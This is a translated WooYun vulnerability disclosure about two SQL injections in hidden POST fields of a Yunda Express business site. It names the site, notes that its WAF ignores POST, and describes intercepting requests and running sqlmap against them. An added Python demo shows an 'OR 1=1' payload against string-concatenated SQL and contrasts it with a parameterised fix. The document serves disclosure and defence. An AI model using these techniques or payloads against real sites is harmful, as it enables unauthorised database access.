
Vulnerability summary

Defect ID: wooyun-2015-0109545

Title: Bundled high-risk SQL injections in a Yunda Express business site

Vendor: Yunda Express (韵达快递)

Author: answer

Submitted: 2015-04-22 09:27

Fixed: 2015-06-06 17:36

Published: 2015-06-06 17:36

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-04-22: Details sent to the vendor, awaiting vendor handling
2015-04-22: Vendor confirmed; details visible to the vendor only
2015-05-02: Details disclosed to core white hats and relevant domain experts
2015-05-12: Details disclosed to regular white hats
2015-05-22: Details disclosed to intern white hats
2015-06-06: Details disclosed to the public

Brief description:

As titled.

Detailed description:

The previous submission was for the registration page; I didn't expect there to be more after registration. This system really has a lot of problems, so I'm submitting them bundled.
I forgot to mention last time: this site also has SafeDog (安全狗), but it seems to only protect GET requests, not POST.
Vulnerable URL:
http://www.yundaex.us/
Register, then log in.
Injection 1:
"My discount codes": click Query, intercept the request, and run sqlmap on it.

[Screenshot: 1.png]


Parameter: hfMemberId is injectable.
Result:

[Screenshot: 3.jpg]


Injection point 2:
The customs duty information page.

[Screenshot: 2.png]


Click Query, intercept the request, and feed it to sqlmap.
Parameter: hfMid is injectable.
This time I'll use the current database user as proof.

[Screenshot: 4.png]


I recommend a full test of this application; it seems to have many problems.

Proof of vulnerability:

Fix suggestion:

Do an overall fix; there are a lot of problems.
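Both injection points in this report share one defect: a hidden form field (hfMemberId on the discount-code page, hfMid on the customs-duty page) is pasted into a SQL statement as text, and it arrives by POST, which the site's WAF does not inspect. The following is an added example, not code from the report or from the Yunda site, that contrasts that pattern with the parameterised form on a constructed SQLite table; the table and column names, the session check and the sample rows are assumptions made for the demo.

```python
import sqlite3

# Constructed sample data standing in for the site's discount-code table.
# Member id 5219 is the value seen in the report's hidden field; the codes
# and the second member are invented for this example.
SAMPLE_ROWS = [
    (5219, "CODE-A1", "3.00"),
    (5219, "CODE-A2", "3.00"),
    (6001, "CODE-B1", "5.00"),
]


def make_db():
    """Build an in-memory SQLite database with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE discount_code (member_id INTEGER, code TEXT, amount TEXT)"
    )
    conn.executemany("INSERT INTO discount_code VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, hf_member_id):
    """The defective pattern: the POSTed hidden field becomes part of the SQL
    text, so anything the client puts in hfMemberId is executed as SQL.
    A WAF that only filters the query string never sees this value."""
    sql = "SELECT code, amount FROM discount_code WHERE member_id = " + hf_member_id
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, hf_member_id, session_member_id):
    """Hardened form (assumed design, not the site's code):
    1. the value is validated as an integer before it goes anywhere near SQL;
    2. it is bound as a query parameter, never concatenated;
    3. a client-supplied member id is only honoured if it matches the member
       already authenticated in the server-side session."""
    try:
        member_id = int(hf_member_id)
    except ValueError:
        return []  # non-numeric input is rejected outright
    if member_id != session_member_id:
        return []  # hidden field may not point at another member's data
    return conn.execute(
        "SELECT code, amount FROM discount_code WHERE member_id = ?",
        (member_id,),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    # A tautology appended to the hidden field returns every member's codes
    # under concatenation, and nothing under the hardened lookup.
    print(lookup_vulnerable(db, "5219 OR 1=1"))
    print(lookup_parameterised(db, "5219 OR 1=1", 5219))
    print(lookup_parameterised(db, "5219", 5219))
```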

Copyright notice: when reposting, credit the source: answer@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-04-22 17:34

Vendor reply:

Thanks for the support; we will fix it immediately.

Latest status:

None yet